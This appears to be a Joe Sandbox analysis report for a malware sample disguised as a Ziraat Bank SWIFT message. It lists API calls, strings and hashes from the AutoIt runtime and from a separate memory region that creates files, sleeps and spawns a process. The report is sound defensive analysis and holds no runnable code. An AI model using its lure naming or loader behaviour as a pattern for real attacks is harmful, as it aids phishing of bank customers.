Part of subcall function 00084024: LoadImageW.USER32(00080000,00000063,00000001,00000010,00000010,00000000), ref: 00084048

RegisterClassExW.USER32(?), ref: 00083F30

Part of subcall function 00083F53: GetSysColorBrush.USER32(0000000F), ref: 00083F86
Part of subcall function 00083F53: RegisterClassExW.USER32(00000030), ref: 00083FB0
Part of subcall function 00083F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00083FC1
Part of subcall function 00083F53: InitCommonControlsEx.COMCTL32(?), ref: 00083FDE
Part of subcall function 00083F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00083FEE
Part of subcall function 00083F53: LoadIconW.USER32(000000A9), ref: 00084004
Part of subcall function 00083F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00084013

Strings

0, xrefs: 00083F02
AutoIt v3, xrefs: 00083F1F
#, xrefs: 00083F09

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d243e18c8685d8a38ca9e48b860af88a081d4dece025ebb373160a262d6242cb
Instruction ID: 8bd33e138eef2b06106f64114a18c4392f9ad0d202866044d326846b04b9c75a
Opcode Fuzzy Hash: d243e18c8685d8a38ca9e48b860af88a081d4dece025ebb373160a262d6242cb
Instruction Fuzzy Hash: C0212AB8D04314ABCB10DFA9EC49A99BBF5FB49714F00412AE214A76B0D7B546C48F91

Function 00E40360 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00E403A5

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: b0f25f92f13258ee1a116f096946a56d6ca7afbea918b0db73609457cd9523b7
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: FB510675A50208FBEF60DFB4DC49FEE77B9AF48700F108554F71AEA180DA74AA449B60

Function 000849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00084A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000F41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000F421A
RegCloseKey.ADVAPI32(?), ref: 000F4249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00084A13
Include, xrefs: 000F41D3, 000F4212

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: e026b3450d42cab6215b72338e772a7f2cc0374f6541a5b3187bd443ba067c04
Instruction ID: c335266ba93614dd841c5721c06e0826944b61c9f49df59005fe05ef858116c8
Opcode Fuzzy Hash: e026b3450d42cab6215b72338e772a7f2cc0374f6541a5b3187bd443ba067c04
Instruction Fuzzy Hash: 6C113D71A00109BEEB04ABA4DD86EFF7BACEF04354F004469B546D6192EBB0AE419B50

Function 000836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 000836E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00083707
ShowWindow.USER32(00000000), ref: 0008371B
ShowWindow.USER32(00000000), ref: 00083724

Strings

AutoIt v3, xrefs: 000836DE, 000836E3, 000836E4
edit, xrefs: 00083701

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0e038ae00adac7c062d6d66d29399d7c9a52f1a3fcaf9bcd66c0ff59a3f3cea1
Instruction ID: 0be4dc01f3c4e24418500a23701a23722593d8dd76c571502c84cbfcee188083
Opcode Fuzzy Hash: 0e038ae00adac7c062d6d66d29399d7c9a52f1a3fcaf9bcd66c0ff59a3f3cea1
Instruction Fuzzy Hash: 4AF0DA795802D07AE7315B97BC08E673E7DE7C7F24B00002ABA04A35B0C66508D5DAB1

Function 000851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0008522F
_wcscpy.LIBCMT ref: 00085283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00085293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000F3CB0

Strings

Line: , xrefs: 000F3CD9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 9c3c143739b3ceca66a1c8d85a1158dc8ef7763cf07e88cc41cd1d378fcf0ced
Instruction ID: 6d8badd5061511bda8d0c03649d0e62b36d40e0fbfcf09b430b76e1b389823ac
Opcode Fuzzy Hash: 9c3c143739b3ceca66a1c8d85a1158dc8ef7763cf07e88cc41cd1d378fcf0ced
Instruction Fuzzy Hash: 1D31AF71008744AED735FB60DC46FDEB7D8BF45310F00451AF5C5925A2EB70A688CB96

Function 00E41E10 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E41D00: Sleep.KERNELBASE(000001F4), ref: 00E41D11

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E41F39

Strings

CZRTSJVDO0NQ5N3HDH, xrefs: 00E41FB9, 00E41FBC

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateFileSleep
String ID: CZRTSJVDO0NQ5N3HDH
API String ID: 2694422964-1444722434
Opcode ID: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
Instruction ID: 5b7a32d190eca1d701b7f8bcdfcd02f347dced269c677f491d08c0e31870f8bd
Opcode Fuzzy Hash: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
Instruction Fuzzy Hash: 2A51B370D04248DBEF11DBE4D815BEEBBB9AF08304F004599E608BB2C1D7791B49DBA5

Function 00084A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00085374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00141148,?,000861FF,?,00000000,00000001,00000000), ref: 00085392

Part of subcall function 000849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00084A1D

_wcscat.LIBCMT ref: 000F2D80
_wcscat.LIBCMT ref: 000F2DB5

Strings

\Include\, xrefs: 00084B0A
\, xrefs: 000F2DA2

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: f8a8d909a891d18396aac733142ee504b6bd7122dbb59ada3e93045726fd18b8
Instruction ID: b702fda1c5e621541e784bed729db25c55bcf70b267479477deaffad09b2ae65
Opcode Fuzzy Hash: f8a8d909a891d18396aac733142ee504b6bd7122dbb59ada3e93045726fd18b8
Instruction Fuzzy Hash: 155184B95043409FC714EF55E9818EAB7F4FF5A700B84492EF68593672EB3095C8CB52

Function 000A34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 000A34FE

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 000A3539
__wopenfile.LIBCMT ref: 000A3549

Strings

<G, xrefs: 000A34CD, 000A34F0, 000A34FC

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 775aa92ba00cbd43797e4c50e21667dadaea220797bb91872879c471873735df
Instruction ID: 40cf50764ee27dd4d265f3992693e73927b9c1a2d15094deb7fd3436b3698ba4
Opcode Fuzzy Hash: 775aa92ba00cbd43797e4c50e21667dadaea220797bb91872879c471873735df
Instruction Fuzzy Hash: 24110A70E00306DFDB61BFF49C426AE76F4AF4B350B148525F419C7182EB34CA1197A1

Function 0009D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0009D28B,SwapMouseButtons,00000004,?), ref: 0009D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0009D28B,SwapMouseButtons,00000004,?,?,?,?,0009C865), ref: 0009D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0009D28B,SwapMouseButtons,00000004,?,?,?,?,0009C865), ref: 0009D2FF

Strings

Control Panel\Mouse, xrefs: 0009D2BA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
Instruction ID: bbb3eb5ae65b5749cde86fafaa9396aefe88774d7009112125bd1caa09073b23
Opcode Fuzzy Hash: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
Instruction Fuzzy Hash: 43113975655208BFDF208FA8DC84EAF7BF8EF54745F10846AF805D7110E671AE41AB60

Function 000CC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00084517: _fseek.LIBCMT ref: 0008452F

Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC65D
Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC670

_free.LIBCMT ref: 000CC4DD
_free.LIBCMT ref: 000CC4E4
_free.LIBCMT ref: 000CC54F

Part of subcall function 000A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000A7A85), ref: 000A1CB1
Part of subcall function 000A1C9D: GetLastError.KERNEL32(00000000,?,000A7A85), ref: 000A1CC3

_free.LIBCMT ref: 000CC557

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction ID: 6e4686f9d40fa8af3bfb10f2a5344bd4b07fc6e863fb712b65a37b5deaa2873b
Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction Fuzzy Hash: 93513EB1904219AFDB249F64DC81BEDBBB9FF48310F1040AEF25DA3242DB715A808F59

Function 00E40A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00E40A85
ExitProcess.KERNEL32(00000000), ref: 00E40AA4

Strings

D, xrefs: 00E40A51

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
Instruction ID: aebd3f082380315f1fddf1a401db405e5542acb3a478774ddd39e97e05dbce29
Opcode Fuzzy Hash: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
Instruction Fuzzy Hash: B6F0F47154024CABDB60DFE0DC49FEE77BDBF44701F508519FB199A180DA7495089B61

Function 000CC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 000CC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000CC746

Strings

aut, xrefs: 000CC740

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: a24610ec369cb9c4e558ef89da5a9f19e91dbfc9f328696aea24fc31475d8067
Instruction ID: db001542a56d88e35cde297b4b74ea84c51ed6bda58c16b166263140b650f4c2
Opcode Fuzzy Hash: a24610ec369cb9c4e558ef89da5a9f19e91dbfc9f328696aea24fc31475d8067
Instruction Fuzzy Hash: 22D05E7150030EABDB10AB90EC0EF8A776C9700708F0041A0B690A50B1DBF4E6D98B54

Function 00084FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00085022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 000850CB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 19c8b420fae34f0d12cb5cda5d84316a114200373d2ceb3ba70e2ec27dddd311
Instruction ID: ec9e2fcfe38d0c607c5fda8705c0564f36506b7f5c3cbf78ccd266adbec244fb
Opcode Fuzzy Hash: 19c8b420fae34f0d12cb5cda5d84316a114200373d2ceb3ba70e2ec27dddd311
Instruction Fuzzy Hash: 41319AB05047019FC761EF64D84469BBBE8FB49309F00092EF6DA83651E771A984CB92

Function 000A395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 000A3973

Part of subcall function 000A81C2: __NMSG_WRITE.LIBCMT ref: 000A81E9
Part of subcall function 000A81C2: __NMSG_WRITE.LIBCMT ref: 000A81F3

__NMSG_WRITE.LIBCMT ref: 000A397A

Part of subcall function 000A821F: GetModuleFileNameW.KERNEL32(00000000,00140312,00000104,00000000,00000001,00000000), ref: 000A82B1
Part of subcall function 000A821F: ___crtMessageBoxW.LIBCMT ref: 000A835F

Part of subcall function 000A1145: ___crtCorExitProcess.LIBCMT ref: 000A114B
Part of subcall function 000A1145: ExitProcess.KERNEL32 ref: 000A1154

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: a7549139f2b7efcf00e6df442413624a757e883a739b6ded7e8fb1e940f49e76
Instruction ID: e27c56bde48800bd1663ee13a47f7b13eab6c62a0bee39abf1a08d6c3e4fec4f
Opcode Fuzzy Hash: a7549139f2b7efcf00e6df442413624a757e883a739b6ded7e8fb1e940f49e76
Instruction Fuzzy Hash: DA01B5353453019AE6623BE9EC46BAF33889F87764F215129F5099B593DFB09D4086A0

Function 000CC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,000CC385,?,?,?,?,?,00000004), ref: 000CC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000CC708
CloseHandle.KERNEL32(00000000,?,000CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CC70F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 04ec30873821734d836ce366889fea76001122a13b1b46c581be810e0ab41ece
Instruction ID: d7e70f7840c2129b373f55f822a9b43c6a6bc92a0da0a66cc4332d110a120c8c
Opcode Fuzzy Hash: 04ec30873821734d836ce366889fea76001122a13b1b46c581be810e0ab41ece
Instruction Fuzzy Hash: 6FE08632140214B7E7211B94FC09FCE7F58EB05760F104210FB54690E097F125518798

Function 000CBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000CBB72

Part of subcall function 000A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000A7A85), ref: 000A1CB1
Part of subcall function 000A1C9D: GetLastError.KERNEL32(00000000,?,000A7A85), ref: 000A1CC3

_free.LIBCMT ref: 000CBB83
_free.LIBCMT ref: 000CBB95

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction ID: d64c8a0b979c0af5c4737ccf97b1a01b5ace2ffe5070116dc95d19739a6e9bf7
Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction Fuzzy Hash: 64E0C7B160070082CA20A6B8AE4AFFB23CC0F05321F04080EB429E3183CF60EC4088B8

Function 00082322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 000822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME), ref: 00082303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000825A1
CoInitialize.OLE32(00000000), ref: 00082618
CloseHandle.KERNEL32(00000000), ref: 000F503A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 3c76a914a95834270e542ffc078179ab1c76b0b23579024a9c3f7333a0f07f49
Instruction ID: b7d91fa9070f615a1ab30ed42d858544ddbdc26978862105c1dfb59416341604
Opcode Fuzzy Hash: 3c76a914a95834270e542ffc078179ab1c76b0b23579024a9c3f7333a0f07f49
Instruction Fuzzy Hash: 5271BFBC941381ABC704EF6AE990895BBA4FB5B3547A0462ED15AD7FB2DBB044C0CF14

Function 000AE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 000AEA29
__close_nolock.LIBCMT ref: 000AEA42

Part of subcall function 000A7BDA: __getptd_noexit.LIBCMT ref: 000A7BDA

